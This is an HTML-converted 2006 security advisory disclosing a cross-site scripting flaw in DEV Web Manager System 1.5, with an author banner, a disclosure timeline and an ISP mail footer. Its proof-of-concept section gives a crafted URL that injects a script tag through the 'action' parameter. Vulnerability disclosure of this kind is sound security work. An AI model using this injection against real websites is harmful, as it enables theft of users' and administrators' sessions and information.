<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7650.21">
<TITLE>{x0n3-h4ck} DEV Web Manager System &lt;= 1.5  XSS Exploit</TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>-=[--------------------ADVISORY-------------------]=-<BR>
-=[&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ]=-<BR>
-=[&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; DEV Web Manager System &lt;= 1.5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ]=-<BR>
-=[&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ]=-<BR>
-=[&nbsp;&nbsp;&nbsp;&nbsp; Author: CorryL [corryl80@gmail.com]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ]=-<BR>
-=[&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; www.x0n3-h4ck.org&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ]=-<BR>
-=[----------------------------------------------------]=-<BR>
<BR>
<BR>
-=[+] Application:&nbsp;&nbsp;&nbsp; DEV Web Manager System<BR>
-=[+] Version:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1.5<BR>
-=[+] Vendor's URL:&nbsp;&nbsp; <A HREF="http://dev-wms.sourceforge.net/">http://dev-wms.sourceforge.net/</A><BR>
-=[+] Platform:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Windows\Linux\Unix<BR>
-=[+] Bug type:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; cross-site script [XSS]<BR>
-=[+] Exploitation:&nbsp;&nbsp; Remote<BR>
-=[-]<BR>
-=[+] Author:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; CorryL&nbsp; ~ corryl80[at]gmail[dot]com ~<BR>
-=[+] Reference:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; www.x0n3-h4ck.org<BR>
<BR>
<BR>
..::[ Descriprion ]::..<BR>
<BR>
DEV web manager system one application web based on php<BR>
<BR>
<BR>
..::[ Bug ]::..<BR>
<BR>
this system e' affect from a bug of type XSS<BR>
a attaker to use the bug in order to steal sensitive information<BR>
to the users or admin<BR>
<BR>
<BR>
..::[ Proof Of Concept ]::..<BR>
<BR>
<A HREF="http://web">http://web</A> site/index.php?session=0&amp;action=&gt;&quot;&gt;&lt;ScRiPt%20%0a%0d&gt;alert(775195196)%3B&lt;/ScRiPt&gt;<BR>
<BR>
<BR>
..::[ Workaround ]::..<BR>
<BR>
Nothing<BR>
<BR>
..::[ Disclousure Timeline ]::..<BR>
<BR>
[07/10/2006] - Vendor notification<BR>
[11/10/2006] - Vendor Response<BR>
[17/10/2006] - No patch relase from vendor<BR>
[17/10/2006] - Public disclousure<BR>
<BR>
<BR>
*********************<BR>
Alice BASIC: mail, antivirus, antispam e invio allegati fino a 2 GB!<BR>
Per maggiori informazioni vai su: <A HREF="http://adsl.alice.it/servizi/alicebasic.html">http://adsl.alice.it/servizi/alicebasic.html</A> </FONT>
</P>

</BODY>
</HTML>